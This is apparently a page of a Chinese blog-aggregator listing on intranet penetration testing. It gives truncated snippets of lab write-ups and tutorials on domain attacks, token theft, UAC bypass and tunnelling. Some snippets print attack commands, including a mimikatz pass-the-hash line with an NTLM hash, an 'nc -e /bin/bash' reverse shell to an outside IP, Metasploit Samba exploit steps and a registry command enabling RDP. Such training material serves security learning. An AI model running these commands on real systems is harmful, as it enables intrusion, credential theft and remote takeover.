Vulnstack内网渗透第6页

Vulnstack----5、ATT&CK红队评估实战靶场五

文章目录一环境搭建二外网渗透三内网信息收集3.1本机信息收集3.2域内信息收集四横向移动4.1路由转发和代理通道4.2抓取域用户密码4.3使用Psexec登录域控4.43389远程登录五、痕迹清理一环境搭建1、项目地址http://vulnstack.qiyuanxuetang.net

七天啊·2023-09-01 15:44

内网环境搭建-前篇

通常所说的内网渗透测试，很大程度上就是域渗透测试。搭建域渗透测试环境，在Windows的活动目录环境下进行一系列操作，掌握其操作方法和运行机制，对内网的安全维护有很大的帮助。

程序媛尤尤·2023-09-01 03:42

红日靶场（一）vulnstack1 渗透过程分析

文章目录环境搭建信息收集PhpMyAdmin后台GetshellintooutfileMysql日志文件写入shellCS后渗透MSF后渗透知识补充nmap参数分类参数速查表dirsearch环境搭建ip段设置kali(coleak)：192.168.145.139Windows7(stu1)：192.168.10.181、192.168.145.140Winserver2008(owa)：192

coleak·2023-08-31 08:27

NTLM 身份认证在工作组、域环境工作原理；相关攻击；schtasks、 tasklist命令；psexec.exe、wmiexec等工具

以下文章可以参考：NTLM身份认证在工作组、域环境工作原理；NTLM相关攻击；schtasks、tasklist命令；psexec.exe、wmiexec等等工具《纯干货-内网渗透系列教程——NTLM与

carcarrot·2023-08-31 06:55

网络渗透day4-Windows域

qq_45955869·2023-08-29 17:01

内网远程控制总结

前言在内网渗透过程中，会碰到远程控制soft或者其他，这里针对远程控制软件做如下总结。远程控制软件向日葵篇向日葵查看版本向日葵（可以攻击）针对向日葵的话其实如果有本地安装的话，是有可能存在漏洞的。

红队蓝军·2023-08-29 17:58

内网渗透解析

1|0一、前言阅读本文前需要先搞懂NAT、PAT、端口映射几个概念，内网宽带中的主机可以访问公网宽带主机，反之不可以访问；公网宽带主机可以和公网宽带主机双向访问；内网宽带中的主机和内网宽带中的主机互相无法访问。那么内网宽带中的客户机和公网宽带中的客户机如何访问另一个内网宽带中的服务器呢？这里就需要用到内网穿透技术。2|0二、应用场景家里或公司是运营商内网ipv4宽带或公网IP在防火墙后，且需要在外

没更新就是没更新·2023-08-28 23:56

内网渗透的思路与方法总结

狙杀链侦查阶段（Reconnaisance）收集攻击目标的信息武器化阶段（Weaponization）构建可以使用的攻击工具，可以说是广义角度的渗透传递阶段（Delivery）通过某种方法将攻击工具发送到攻击目标利用阶段(Exploitation)由攻击工具触发系统中的漏洞安装阶段（Installation）执行恶意脚本/安装恶意程序命令&控制阶段(Command&Control)在攻击目标上开启

四维虫虫·2023-08-24 19:23

内网渗透神器CobaltStrike之权限提升(七)

Uac绕过常见uac攻击模块UAC-DLLUAC-DLL攻击模块允许攻击者从低权限的本地管理员账户获得更高的权限。这种攻击利用UAC的漏洞，将ArtifactKit生成的恶意DLL复制到需要特权的位置。适用于Windows7和Windows8及更高版本的未修补版本Uac-token-duplication此攻击模块也是为了从低权限的本地管理员账户获得更高的权限。它通过利用UAC漏洞，使非提升进程可

Henry404s·2023-08-22 06:22

内网渗透之IP和端口扫描器制作（Python版本）

通过socket和scapy库进行内网中存活主机IP和开放端口的扫描，其中一些ip我在自己实验时已经写死，如要使用改成自己的内网ip即可。废话不多说，直接上代码，代码中关键地方我已经注释过了。importsocketimportthreadingimportosfromscapy.layers.inetimportIP,TCPfromscapy.layers.l2importARPfromscap

m0_56375711·2023-08-20 05:37

内网渗透-内网穿透&猕猴桃抓密码提权&烂土豆提权

一、SQL注入getshell1、直接SQL语法写文件（1）Mysql导出函数：intooutfileintodumpfile[可以写16进制写入]（2）1290的安全性报错：是5.0版本之后，来禁止MySQL给本地存放数据需要修改MySQL的配置文件写一个：secure-file-priv=来防止1290的安全性报错（3）这里需要注意：我们得写绝对路径,绝对路径我们可以通过让网页PHP报错出来，

无名安全·2023-08-16 10:13

[内网渗透]CFS三层靶机渗透

文章目录[内网渗透]CFS三层靶机渗透网络拓扑图靶机搭建Target10x01.nmap主机探活0x02.端口扫描0x03.ThinkPHP5RCE漏洞拿shell0x04.上传msf后门(reverse_tcp

Leekos·2023-08-13 05:27

内网渗透--对不出网目标的打法

配置网络在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下：win7具有双网卡，其中外网ip是192.168.8.133，内网网段是52。三台机器彼此互通，但是winserver2008和win2003不通外网。用我mac作为攻击机，来对这个靶场环境进行渗透测试。外网打点在win7这台靶机上，使用PHPStudy让网站可以运行起来。在攻击机上，访问http://192.168.8.133

CanMeng·2023-08-12 22:35

铁三web回忆录

首发secquan点我加入secquan0x00前言今年的铁三是分赛区的，我们赛区是最后一个，我也预习了下功课，有备无患嘛，分为数据分析赛，个人赛(PWN)，企业赛(内网渗透)。

RedTeamWing·2023-08-09 22:15

[网络安全提高篇] 一二三.恶意样本分类之基于API序列和深度学习的恶意家族分类详解

“网络安全提高班”新的100篇文章即将开启，包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结，它将更加聚焦，更加深入，也是作者的慢慢成长史。

Eastmount·2023-08-09 21:18

内网渗透windows 命令行开启3389

查看RDP端口查看端口REGQUERY"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp"/VPortNumber得到连接端口为0xd3d，转换后为3389windowsserver2003开启1：REGADD\"HKLM\SYSTEM\CurrentControlSet\C

q1ya·2023-08-08 13:41

【原创】内网穿透案例

案列一（Frp内网渗透）大概图列网上随便找的，路线是这个样子这里选用ctfshow的一道命令执行题由Frp实现内网访问及扫描1.传入一句话，上线蚁剑http://b85fdf24-b98e-4810-9e76

前端码农小王·2023-08-04 13:14

内网渗透学习总结

内网渗透内网渗透思路：通过域主机，找到域控ip以及管理员账号，利用域成员主机为跳板，扩大渗透范围。设法从域成员主机内存中dump域管理密码，进而拿下域控渗透整个内网。

LLHSKY·2023-08-04 06:29

vulnstack-ATT&CK[四]打靶记录

文章目录前言靶场主机介绍攻击过程Web渗透docker逃逸内网渗透内网域控总结前言出来工作之后，有点热情消退，白天上班，晚上摆烂。

Aiwin-Hacker·2023-07-31 05:40

[内网渗透]SUID提权

文章目录[内网渗透]SUID提权0x01.什么是SUID？0x02.如何设置SUID？

Leekos·2023-07-29 18:41

内网渗透-横向移动三

PTH传递先获取到域控这边的NTLM执行命令privilege::debugsekurlsa::logonpasswords然后在域内主机用mimikatz连接sekurlsa::pth/user:administrator/domain:god/ntlm:ccef208c6485269c20db2cad21734fe7c成功后会弹出一个新的cmd直接在这里面连接域控就可以PTK传递如果打补丁的话

Admin3K·2023-07-29 11:00

内网隧道代理技术（十三）之内网代理介绍

这个，因为某些不可抗拒力量，第十二篇博客无法发表，如果想要查阅，请加内网渗透qq群：838076210内网代理介绍内网代理介绍内网资产扫描这种场景一般是进行内网渗透才需要的代理技术，如果你不打内网一般是不需要这种技术的

千负·2023-07-29 07:45

每日安全资讯（2019.09.06）

用Golang打造一款便携式网络拓扑可视化的工具之前做内网渗透测试的时候，一直想要有一款能够格式化存储收集到的信息，并且可以方便的查找出重要信息的工具。

溪边的墓志铭·2023-07-29 05:09

MSF内网渗透系列2-权限提升

在上篇文章中，通过win7运行msf.exe，kali接收到一个session，但这个session权限只是普通权限，无法做更多的操作。权限提升1.提高程序运行级别2.UAC绕过3.利用提权漏洞进行提权提高程序运行级别msf模块>exploit/windows/local/ask但会触发UAC，只有当用户同意是才能获得更高权限5meterpreterx64/windowswin7-PC\win7@

YEmooX·2023-07-26 12:18

【安全day_01】

python/java/mysql/redis/linux相关/shell/iptables/awk）@安全基础目录web漏洞模块（xss/sql/inject/include/ssrf/CSRF/…)内网渗透

柠檬三号·2023-07-26 02:58

ctfshow web入门内网渗透篇

web859首先ssh连接上之后传个fscan上去，扫描下内网靶机发现.5和.6的比较可疑。一个存在web服务，一个存在445端口。先看下445端口，靶机给我们提供了msf，所以直接用msf打下Sambamsfconsoleuseexploit/linux/samba/is_known_pipenamesetrhostx.x.x.xexploit拿下之后就有flag了再来看下另外一台靶机，因为存在

yu22x·2023-07-25 20:10

记一次内网渗透测试实训总结

原文连接前言时间很快就来到了学期的最后一个月，和上学期一样，最后的几周是实训周，而这次实训恰好就是我比较喜欢的网络攻防，因为之前学过相关的知识，做过一些靶场，相比于其他同学做起来要快些，不过内网渗透也还是头一次

faaany·2023-07-25 20:36

【网络安全】DVWA靶场实战&BurpSuite内网渗透

BurpSuite内网渗透一、攻击模式介绍1.1Sniper（狙击手）1.2Batteringram（攻城锤）1.3Pitchfork（草叉）1.4Clusterbomb（榴霰弹）二、DVWA靶场搭建2.1

九芒星#·2023-07-25 18:20

【推荐】阿里云主机accesskey利用工具

APP中也会泄露这些信息.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。

安全大哥·2023-07-21 03:20

[内网渗透]—令牌窃取

令牌简介令牌（Token）是指系统中的临时秘钥，相当于账户和密码，有了令牌就可以在不知道密码的情况下访问目标相关资源了，这些令牌将持续存在于系统中，除非系统重新启动分类授权令牌（Delegationtoken）：交互式会话登陆（例：本地用户登陆、用户桌面等）模拟令牌（Impersonationtoken）：非交互式登陆（例：netuse访问共享文件）两种token只在系统重启后清除具有Delega

Sentiment.·2023-07-17 07:10

内网渗透_令牌窃取

内网渗透_令牌窃取0x01.令牌简介令牌（Token）是指系统中的临时秘钥，相当于账户和密码，有了令牌就可以在不知道密码的情况下访问目标相关资源了，这些令牌将持续存在于系统中，除非系统重新启动0x02.

Beyond My·2023-07-17 07:38

内网渗透之Token令牌窃取

文章目录前言一、Token的作用二、令牌的种类三、AccessToken的窃取与利用1.incognito.exe程序2.MSF下的incognito模块3.MSF方式令牌窃取靶机演示前言本文包括：令牌的基本概念和种类，以及在windows靶场环境下访问令牌的窃取利用，靶场为ATT&CK红队评估实战靶场(二)的DC靶机。一、Token的作用1）令牌(token)是系统的临时秘钥，相当于账号和密码，

Mauro_K·2023-07-17 07:38

靶场练习--春秋云境-Tsclient

简介：Tsclient是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点

NooEmotion·2023-07-16 17:50

内网渗透DC-5靶场通关

个人博客地址:点我DC系列共9个靶场，本次来试玩一下一个DC-5，只有一个flag，下载地址。下载下来后是.ova格式，建议使用vitualbox进行搭建，vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式，桥接模式可能会造成目标过多不易识别。IPDC-5:192.168.31.107Kali:192.168.31.18Win7:192.168.31.168信息搜集首先是主机发现，得到

xzajyjs·2023-07-16 03:02

Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub

个人博客阅读体验更佳本次来试玩一下vulnhub上的Billu_b0x2，下载地址。下载下来后是.ova格式，建议使用vitualbox进行搭建，vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式，桥接模式可能会造成目标过多不易识别。IPwin7:192.168.31.44kali:192.168.31.17靶机:192.168.31.132信息搜集主机发现得到靶机ip，接着进行端口扫

xzajyjs·2023-07-16 03:31

红队打靶，红日系列，红日靶场2

文章目录描述：环境搭建:外网渗透：漏洞利用冰蝎连接，拿到shell内网渗透转站CSCS插件提权域渗透与横向移动描述：红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习

青衫木马牛·2023-07-14 07:56

红队打靶，红日靶场系列，红日靶场4

文章目录环境搭建：外网渗透：Struts2phpmyadmintomcat内网渗透msf上线建立代理内网信息收集密码获取总结环境搭建：攻击机：真实机win10kali：192.168.0.128靶机：web

青衫木马牛·2023-07-14 07:56

网络安全（黑客）内网渗透基础知识

0x01内网概述内网也指局域网（LocalAreaNetwork，LAN）是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。内网是封闭型的，它可以由办公室内的两台计算机组成，也可以由一个公司内的上千台计算机组成。列如银行、学校、企业工厂、政府机关、网吧、单位办公网等都属于此类。0x

没更新就是没更新·2023-07-13 21:37

2023网络安全常见面试题汇总（附答案解析+配套资料）

小V讲安全·2023-07-13 21:32

应急响应-Linux

博客主页：不知名白帽的博客_CSDN博客-网络安全,CTF,内网渗透领域博主网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan目录关键目录常用命令日志分析关键目录文件名说明

不知名白帽·2023-06-23 21:45

内网渗透(八十八)之委派攻击

委派委派是大型网络中经常部署的应用模式，给多跳认证带来了很大的便利与此同时也带来了很大的安全隐患。利用委派，攻击者可结合其他漏洞进行组合攻击，导致攻击者可获取本地管理员权限甚至域管理员权限，还可以制作深度隐藏的后门。委派是指将域内用户的权限委派给服务账户，使得服务账户能以用户权限访问域内的其他服务。委派的流程图如图所示，域内用户A以Kerberos身份验证访问Web服务器请求下载文件，但是真正的文

千负·2023-06-23 20:24

课程汇报 kerberoasting攻击学习

一、基础(6条消息)内网渗透-获取WIN本地用户Hash_windows账号hash在哪_XG小刚的博客-CSDN博客渗透基础——活动目录信息的获取(qq.com)渗透基础——域内用户口令策略的获取(qq.com

叙..·2023-06-23 10:46

内网渗透-常用反弹shell方法总结

常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell:nc-e/bin/bash1.1.1.199992.如果linux中nc没有-e参数3.nc弹windows下的shell:whois反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell前言bash反弹shell

炫彩@之星·2023-06-22 19:03

渗透测试基础

常用于内网渗透拖库“脱裤”：入侵成功且进入数据库后，将数据库全部下载下来。一句话木马：通过向服务器提交一段简短的代码，配合

丘丘用户思思澪·2023-06-22 06:59

PHP学习笔记第四天

博客主页：不知名白帽的博客_CSDN博客-网络安全,CTF,内网渗透领域博主网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan目录PHP超级全局变量PHP

不知名白帽·2023-06-22 01:48

渗透测试流程

的区别CSRF和SSRF的区别CSRF和XSS和XXE区别中间件漏洞PHP代码审计容易出问题的点GET和POST的区别Cookie和Session的区别webshell的检测方法反弹shell常用命令内网渗透提权免杀应急响应反

冰峰zoubf·2023-06-21 10:44

内网渗透—隧道搭建&SPP与NPS内网穿透

内网渗透—隧道搭建&SPP与NPS内网穿透1.前言2.SPP2.1.SPP代理通信2.1.1.服务端配置2.1.2.客户端配置2.1.3.CS设置2.1.3.1.设置生成的监听器2.1.3.2.设置监听的监听器

剁椒鱼头没剁椒·2023-06-19 23:30

我的内网渗透-Empire基本操作

简介Empire是一个纯粹的PowerShell开发后代理，基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能，而无需powershell.exe，从关键记录器到Mimikatz的可快速部署的利用后模块，以及适应性强的通信以逃避网络检测，所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。安装正常情况下apt-get（具有一

偷吃"游"的阿彪·2023-06-19 03:57

我的内网渗透-Empire进阶（会话转移和剪贴板攻击）

目录剪贴版攻击安装运行注意会话迁移剪贴版攻击安装下载网址https://github.com/D4Vinci/PasteJacker下载的两种方式①直接在windows中下载，然后解压完把文件夹传到kali中进行安装②只接在kali中下载gitclonehttps://github.com/D4Vinci/PasteJacker#下载压缩包unzipPasteJacker-master.zip#解